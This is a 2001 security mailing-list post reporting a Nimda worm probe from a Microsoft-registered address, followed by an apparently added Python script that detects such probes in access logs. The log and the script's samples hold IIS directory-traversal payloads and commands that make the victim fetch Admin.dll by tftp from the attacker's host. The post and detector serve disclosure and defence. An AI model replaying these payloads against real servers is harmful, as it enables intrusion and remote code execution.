Forwarded from: Jay D. Dyson <jdysonat_private>

Also sent to SecurityFocus's Incidents list.

-----BEGIN PGP SIGNED MESSAGE-----

Hi folks,

Normally I wouldn't be sending this out, but I figure folks need to be
aware and wary, considering the origin of this intrusion attempt.

I received an early Xmas present from Microsoft. No, I didn't get XP,
nor did I get the latest Office software suite. I got a Nimda intrusion
attempt. Early Bird[1] picked up on this intrusion attempt and
immediately notified Microsoft. I've yet to hear back from Microsoft as
to why this attack from their network came to pass[2].

For those who are interested, here's the log excerpt.

208.229.100.126 - - [24/Dec/2001:19:34:36 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 367 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:34:46 -0800] "GET /scripts/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 421 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:34:56 -0800] "GET /scripts/Admin.dll HTTP/1.0" 200 361 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:06 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 365 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:17 -0800] "GET /MSADC/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 419 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:27 -0800] "GET /MSADC/Admin.dll HTTP/1.0" 200 359 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:37 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:51 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:07 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:18 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:28 -0800] "GET /c/Admin.dll HTTP/1.0" 200 355 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:38 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:49 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:59 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:09 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:23 -0800] "GET /d/Admin.dll HTTP/1.0" 200 355 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:39 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:54 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:10 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:24 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:35 -0800] "GET /scripts/..%255c../Admin.dll HTTP/1.0" 200 371 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:45 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 412 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:00 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:11 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:25 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:40 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:51 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 412 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:06 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:17 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:31 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:46 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:57 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 440 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:12 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 497 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:23 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 497 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:37 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 497 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:52 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../Admin.dll HTTP/1.0" 200 420 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:03 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:18 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:29 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:43 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:58 -0800] "GET /scripts/..%c1%1c../Admin.dll HTTP/1.0" 200 372 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:19 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:29 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:40 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:50 -0800] "GET /scripts/..%c0%af../Admin.dll HTTP/1.0" 200 372 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:09 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:20 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:31 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:41 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:51 -0800] "GET /scripts/..%c1%9c../Admin.dll HTTP/1.0" 200 372 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:01 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 395 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:12 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 452 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:23 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 452 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:33 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 452 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:43 -0800] "GET /scripts/..%25%35%63../Admin.dll HTTP/1.0" 200 375 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:57 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:13 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:28 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:44 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:58 -0800] "GET /scripts/..%252f../Admin.dll HTTP/1.0" 200 371 "-" "-"

$ whois -h whois.arin.net 208.229.100.126
Microsoft Labs (NETBLK-UU-208-229-100-D1)
   One Microsoft Way
   Redmond, WA 98052
   US

   Netname: UU-208-229-100-D1
   Netblock: 208.229.100.0 - 208.229.101.255

   Coordinator:
      Steig, Rick  (RS8676-ARIN)  a-rickstat_private
      (425) 703-3061

   Record last updated on 03-Nov-1997.
   Database last updated on 27-Dec-2001 19:55:32 EDT.

- -Jay

1. http://www.treachery.net/earlybird/
2. If anyone from Microsoft is reading this, I'd appreciate something
   more pleasant next holiday season. (FYI, the machine you hit ran XP
   for only 15 seconds. It now runs Linux.)

  (    (                                                          _______
  ))   ))   .-"There's always time for a good cup of coffee"-.   >====<--.
C|~~|C|~~| (>----- Jay D. Dyson -- jdysonat_private -----<)  |    =  |-'
 `--' `--'  `---------- Si vis pacem, para bellum. ----------'  `------'

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: See http://www.treachery.net/~jdyson/ for current keys.

iQCVAwUBPC0YPrlDRyqRQ2a9AQFXDAQAoXxjVbh6fTzpUPyQFB8aJGpxOLg/+Om+
1Zck8Fw7/tfKsq97YLSqSsp2r4Q5+ybQqXxdnbLVgVsPhKhazzXNrcPKWXhYQU8q
BYT1edg658tvKND0I5NeWoU+vzqzR0NPtppmBKCEMlwz+zG2Nz3nTzT7jMpzmxPo
uNDtpRKBcGs=
=9DpW
-----END PGP SIGNATURE-----

-
ISN is currently hosted by Attrition.org

To unsubscribe email majordomoat_private with 'unsubscribe isn'
in the BODY of the mail.
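The log above is the classic Nimda probe sequence: first the Code Red II backdoor (root.exe), then cmd.exe reached through the IIS "Web Server Folder Traversal" and double-decoding bugs (%255c, %25%35%63, %252f, and the overlong UTF-8 forms %c0%af, %c1%1c, %c1%9c), each followed by a `tftp -i <attacker> GET Admin.dll` fetch and a request for the dropped Admin.dll. The following detector is an added example, written for this editorial pass; it is not code from the post, from Early Bird or from ISN. It parses NCSA-format lines, normalises the request-URI the way a lenient IIS-era decoder would (that decoder model is an assumption, not a statement about the machine in the post), and flags requests by what they ask for rather than by the HTTP status, since the same worm drew 200, 400 and 404 within two minutes here. The first seven sample lines are copied from the post; the last one (192.0.2.10, a documentation address) is constructed to show a benign request is not flagged.

```python
"""Flag Nimda-style IIS probes in NCSA/Apache access-log lines.

Added example, not from the original post. The normaliser models a lenient
IIS-4/5-era URL decoder: it decodes repeatedly (so %255c -> %5c -> '\\') and
accepts overlong two-byte UTF-8 such as %c0%af ('/') and %c1%9c ('\\').
That model is an assumption of this script, not a claim about any server.
"""
import re
from urllib.parse import unquote, unquote_plus

# One entry per line, NCSA common/combined format (referrer and UA optional).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Overlong two-byte UTF-8: a lenient decoder keeps 5 low bits of the lead byte
# and 6 low bits of the trail byte without checking that the trail byte is
# 10xxxxxx.  %c0%af -> 0x2f '/', %c1%1c and %c1%9c -> 0x5c '\'.
OVERLONG_RE = re.compile(r'%(c0|c1)%([0-9a-f]{2})', re.IGNORECASE)
TFTP_RE = re.compile(r'tftp\s+-i\s+(\S+)\s+get\s+(\S+)', re.IGNORECASE)
SUSPECT_FILES = {'cmd.exe', 'root.exe', 'admin.dll'}   # lower-case basenames


def _overlong(m):
    lead, trail = int(m.group(1), 16), int(m.group(2), 16)
    return chr(((lead & 0x1F) << 6) | (trail & 0x3F))


def iis_normalize(uri):
    """Path part of a request-URI as the lenient decoder would see it: overlong
    bytes folded, percent-encoding decoded until stable (at most 3 rounds),
    backslashes turned into slashes, lower-cased."""
    path = uri.split('?', 1)[0]
    for _ in range(3):
        step = unquote(OVERLONG_RE.sub(_overlong, path))
        if step == path:
            break
        path = step
    return path.replace('\\', '/').lower()


def classify(uri):
    """Return (normalised_path, reasons); an empty reasons list means clean."""
    path = iis_normalize(uri)
    query = unquote_plus(uri.split('?', 1)[1]) if '?' in uri else ''
    reasons = []
    base = path.rsplit('/', 1)[-1]
    if base in SUSPECT_FILES:
        reasons.append('target:' + base)
    if '/../' in path:                      # traversal survived normalisation
        reasons.append('traversal')
    if query.lower().startswith('/c '):     # cmd.exe /c <command>
        reasons.append('shell-command')
    m = TFTP_RE.search(query)
    if m:                                   # second stage: pull the worm body
        reasons.append('tftp-fetch:' + m.group(1))
    return path, reasons


def scan(log_text):
    """Parse every line and keep those with at least one reason.  The status
    is reported but never used as a filter: the post shows 200, 400 and 404
    for the same worm, so it says nothing about whether a request was hostile."""
    hits = []
    for line in log_text.splitlines():
        rec = LOG_RE.match(line)
        if not rec:
            continue
        path, reasons = classify(rec['uri'])
        if reasons:
            hits.append({'ip': rec['ip'], 'ts': rec['ts'],
                         'status': int(rec['status']), 'path': path,
                         'reasons': reasons})
    return hits


# First seven lines are copied from the post; the last is a constructed benign
# request from a documentation address (RFC 5737) to show it is not flagged.
SAMPLE_LOG = """\
208.229.100.126 - - [24/Dec/2001:19:34:36 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 367 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:34:46 -0800] "GET /scripts/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 421 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:37 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:39 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:01 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:58 -0800] "GET /scripts/..%252f../Admin.dll HTTP/1.0" 200 371 "-" "-"
192.0.2.10 - - [24/Dec/2001:19:50:00 -0800] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"
"""

if __name__ == '__main__':
    for h in scan(SAMPLE_LOG):
        print(h['ts'], h['ip'], h['status'], h['path'], ', '.join(h['reasons']))
```

Run it as a script and it prints one line per flagged request with the decoded path and the reasons; feed a real access log to `scan()` to get the same dicts. The point of `iis_normalize` is that all six encodings in the post collapse to the same `/scripts/../../winnt/system32/cmd.exe`, so one string test catches the whole family instead of a signature per encoding, and the `tftp-fetch:` reason gives you the address the worm wanted the victim to pull Admin.dll from, which is the host to look at first.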
This archive was generated by hypermail 2b30 : Sat Dec 29 2001 - 01:19:18 PST